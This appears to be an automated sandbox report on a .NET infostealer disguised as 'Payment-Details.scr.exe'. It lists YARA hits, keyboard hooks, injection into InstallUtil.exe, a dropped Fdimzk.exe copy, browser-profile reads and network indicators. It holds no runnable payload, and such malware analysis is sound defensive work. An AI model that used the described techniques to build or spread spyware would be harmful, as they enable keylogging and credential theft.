                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.000000000273C000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000002F0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: unknownNetwork traffic detected: HTTP traffic on port 62399 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 62398 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 62401 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 62400 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62398
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62399
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62400
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62401
                    Source: unknownHTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:62398 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:62401 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, POq2Ux.cs.Net Code: mDt2FXita0Y
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 5.2.Fdimzk.exe.41206f0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 4.2.Fdimzk.exe.382ec18.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 4.2.Fdimzk.exe.382ec18.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.Fdimzk.exe.41206f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: Payment-Details.scr.exe
                    Sample has a suspicious name (potential lure to open the executable)
                    Source: Payment-Details.scr.exeStatic file information: Suspicious name
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_063621B8 NtProtectVirtualMemory,0_2_063621B8
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_063632B0 NtResumeThread,0_2_063632B0
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_063621B0 NtProtectVirtualMemory,0_2_063621B0
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_063632A8 NtResumeThread,0_2_063632A8
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_058421B8 NtProtectVirtualMemory,4_2_058421B8
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_058432B0 NtResumeThread,4_2_058432B0
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_058421B0 NtProtectVirtualMemory,4_2_058421B0
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_058432A8 NtResumeThread,4_2_058432A8
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_019FBA100_2_019FBA10
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_019F61170_2_019F6117
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_019F61280_2_019F6128
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_063667380_2_06366738
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0636E5A80_2_0636E5A8
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_06364E740_2_06364E74
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0636F7080_2_0636F708
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_06361F380_2_06361F38
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_06365A780_2_06365A78
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0636BBDF0_2_0636BBDF
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_063667280_2_06366728
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0636E5980_2_0636E598
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_063668220_2_06366822
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_063609200_2_06360920
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0636F6FA0_2_0636F6FA
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0636D5F80_2_0636D5F8
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0636D5E80_2_0636D5E8
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_063612B00_2_063612B0
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_063612C00_2_063612C0
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_063690220_2_06369022
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0636B0C40_2_0636B0C4
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_06361F280_2_06361F28
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_06365A690_2_06365A69
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_066F44610_2_066F4461
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_066F44700_2_066F4470
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070EA7480_2_070EA748
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070E142C0_2_070E142C
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070EBC900_2_070EBC90
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070E00400_2_070E0040
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070EA7380_2_070EA738
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070EBC800_2_070EBC80
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070E530F0_2_070E530F
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070E53200_2_070E5320
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070E41A80_2_070E41A8
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070E41B80_2_070E41B8
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_070E00060_2_070E0006
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0723F2280_2_0723F228
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0723D2A00_2_0723D2A0
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_07236AB80_2_07236AB8
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0723E7480_2_0723E748
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0723E7580_2_0723E758
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0723F2180_2_0723F218
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0723D2900_2_0723D290
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0723A9400_2_0723A940
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0725BF600_2_0725BF60
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_07257E300_2_07257E30
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_07257E210_2_07257E21
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_07258D280_2_07258D28
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_07258D380_2_07258D38
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0725C2870_2_0725C287
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0725D1580_2_0725D158
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_072500060_2_07250006
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_072500400_2_07250040
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_072CEC580_2_072CEC58
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0752D3880_2_0752D388
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_075100400_2_07510040
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeCode function: 0_2_0751001E0_2_0751001E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_02194AC03_2_02194AC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_02193EA83_2_02193EA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0219AC203_2_0219AC20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0219DC583_2_0219DC58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_021941F03_2_021941F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0219D4083_2_0219D408
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0219D4B83_2_0219D4B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05C09F803_2_05C09F80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05C766D83_2_05C766D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05C731403_2_05C73140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05C7E4A83_2_05C7E4A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05C777883_2_05C77788
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05C700403_2_05C70040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05C75A973_2_05C75A97
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_05C700073_2_05C70007
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_00A0BA104_2_00A0BA10
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_00A061284_2_00A06128
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_00A061174_2_00A06117
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0584D5904_2_0584D590
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_05841F384_2_05841F38
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_058467384_2_05846738
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0584E6C04_2_0584E6C0
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_05844E744_2_05844E74
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_05845A784_2_05845A78
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0584D5804_2_0584D580
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_05841F284_2_05841F28
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_058467284_2_05846728
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0584E6B14_2_0584E6B1
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_058468224_2_05846822
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_058412B04_2_058412B0
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_058412C04_2_058412C0
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_05845A694_2_05845A69
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0673A7484_2_0673A748
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0673142C4_2_0673142C
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0673BC904_2_0673BC90
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_067300404_2_06730040
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0673A7384_2_0673A738
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0673BC804_2_0673BC80
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_067353204_2_06735320
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0673530F4_2_0673530F
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_067300074_2_06730007
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_067341B84_2_067341B8
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_067341A84_2_067341A8
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0688D2A04_2_0688D2A0
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_06886AB84_2_06886AB8
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0688F2284_2_0688F228
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0688D2904_2_0688D290
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0688D2034_2_0688D203
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0688F2184_2_0688F218
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0688E7484_2_0688E748
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0688E7584_2_0688E758
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_068A7E304_2_068A7E30
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_068ABF604_2_068ABF60
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_068A7E214_2_068A7E21
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_068A8D284_2_068A8D28
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_068A8D384_2_068A8D38
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_068AC2874_2_068AC287
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_068A003A4_2_068A003A
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_068A00404_2_068A0040
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_068AD1584_2_068AD158
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_06903D584_2_06903D58
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_06903D484_2_06903D48
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_0691EC584_2_0691EC58
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_06B7D3884_2_06B7D388
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_06B600064_2_06B60006
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeCode function: 4_2_06B600404_2_06B60040
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000043B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1691456068.0000000006F40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXzvnmbab.dll" vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1674818011.000000000144E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.0000000004409000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.0000000004409000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesURE-FILE.exe4 vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000000.1430433952.0000000000F84000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesURE-FILE.exe4 vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000033FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000036C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1690104428.0000000006690000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXzvnmbab.dll" vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exeBinary or memory string: OriginalFilenamesURE-FILE.exe4 vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 5.2.Fdimzk.exe.41206f0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.Fdimzk.exe.382ec18.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.Fdimzk.exe.382ec18.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.Fdimzk.exe.41206f0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, cEMTeSTJCQwtXJPNZNI.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, cEMTeSTJCQwtXJPNZNI.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, cEMTeSTJCQwtXJPNZNI.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, cEMTeSTJCQwtXJPNZNI.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, ZTFEpdjP8zw.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, WnRNxU.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, 2njIk.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, I5ElxL.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, QQSiOsa4hPS.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, FdHU4eb83Z7.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@3/3
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeFile created: C:\Users\user\AppData\Roaming\Fdimzk.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: Payment-Details.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Payment-Details.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Payment-Details.scr.exeReversingLabs: Detection: 18%
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeFile read: C:\Users\user\Desktop\Payment-Details.scr.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Payment-Details.scr.exe "C:\Users\user\Desktop\Payment-Details.scr.exe"
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Fdimzk.exe "C:\Users\user\AppData\Roaming\Fdimzk.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Fdimzk.exe "C:\Users\user\AppData\Roaming\Fdimzk.exe"
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
